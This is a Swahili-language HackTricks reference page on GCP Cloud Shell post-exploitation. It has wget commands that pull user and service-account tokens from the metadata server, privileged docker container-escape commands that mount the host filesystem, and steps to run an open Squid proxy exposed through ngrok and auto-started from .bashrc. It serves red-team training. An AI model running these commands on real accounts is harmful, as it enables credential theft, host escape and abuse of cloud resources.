GCP - Cloud Shell Post Exploitation

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Angalia mpango wa usajili!

Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.

Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

Cloud Shell

Kwa taarifa zaidi kuhusu Cloud Shell angalia:

GCP - Cloud Shell Enum

Inapata token ya mtumiaji kutoka metadata

Kwa kuwasiliana tu na metadata server unaweza kupata token ya kuingia kama mtumiaji aliyesajiliwa sasa:

wget -q -O - --header "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/"

Container Escape / Docker use

Warning

Hapo awali, cloud shell ilikuwa ikikimbia ndani ya container iliyo na ufikiaji wa docker socket ya host. Sasa Google imebadilisha usanifu, na container ya cloud shell sasa inaendesha muundo wa “Docker in a container”. Kwa hivyo hata ikiwa inawezekana kutumia docker kutoka cloud shell, hutaweza kutoroka kwenda host kwa kutumia docker socket. Kumbuka kwamba hapo awali faili ya docker.sock ilikuwa imewekwa katika /google/host/var/run/docker.sock, lakini sasa imehamishwa hadi /run/docker.sock.

Docker use / Old container escape commands

```bash sudo docker -H unix:///run/docker.sock pull alpine:latest sudo docker -H unix:///run/docker.sock run -d -it --name escaper -v "/proc:/host/proc" -v "/sys:/host/sys" -v "/:/rootfs" --network=host --privileged=true --cap-add=ALL alpine:latest sudo docker -H unix:///run/docker.sock start escaper sudo docker -H unix:///run/docker.sock exec -it escaper /bin/sh ```

Zaidi ya hayo, hapo zamani ilikuwa inawezekana kupata token kwa service account iliyotumiwa na cloud shell VM kwenye metadata server:

Service account ya zamani kutoka metadata

```bash wget -q -O - --header "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/" default/ vms-cs-europe-west1-iuzs@m76c8cac3f3880018-tp.iam.gserviceaccount.com/ ``` Kwa scopes zifuatazo: ```bash wget -q -O - --header "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/vms-cs-europe-west1-iuzs@m76c8cac3f3880018-tp.iam.gserviceaccount.com/scopes"

https://www.googleapis.com/auth/devstorage.read_only https://www.googleapis.com/auth/logging.write https://www.googleapis.com/auth/monitoring.write

</details>



### Tumia kama Proxy

Ikiwa unataka kutumia instance yako ya google cloud shell kama proxy unahitaji kuendesha amri zifuatazo (au uziingize kwenye faili .bashrc):

<details>

<summary>Sakinisha Squid proxy</summary>
```bash
sudo apt install -y squid

Kwa taarifa, Squid ni http proxy server. Unda faili squid.conf na mipangilio ifuatayo:

Unda faili squid.conf

```bash http_port 3128 cache_dir /var/cache/squid 100 16 256 acl all src 0.0.0.0/0 http_access allow all ```

nakili faili ya squid.conf hadi /etc/squid

Nakili config kwenye /etc/squid

```bash sudo cp squid.conf /etc/squid ```

Hatimaye endesha huduma ya squid:

Anzisha huduma ya squid

```bash sudo service squid start ```

Tumia ngrok ili proxy ipatikane kutoka nje:

Fungua proxy kwa kutumia ngrok

```bash ./ngrok tcp 3128 ```

Baada ya kuendesha, nakili URL ya tcp://. Ikiwa unataka kuendesha proxy kutoka kwa kivinjari, inapendekezwa kuondoa sehemu ya tcp:// na port, kisha weka port katika uwanja wa port wa mipangilio ya proxy wa kivinjari chako (squid ni http proxy server).

Ili matumizi bora wakati wa kuanzisha, faili .bashrc inapaswa kuwa na mistari zifuatazo:

Ongeza kwenye .bashrc kwa kuanzisho kiotomatiki

```bash sudo apt install -y squid sudo cp squid.conf /etc/squid/ sudo service squid start cd ngrok;./ngrok tcp 3128 ```

Maelekezo yalichukuliwa kutoka https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key. Angalia ukurasa huo kupata mawazo mengine ya wazimu ya kuendesha aina yoyote ya programu (databases na hata windows) katika Cloud Shell.

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Angalia mpango wa usajili!

Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.

Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.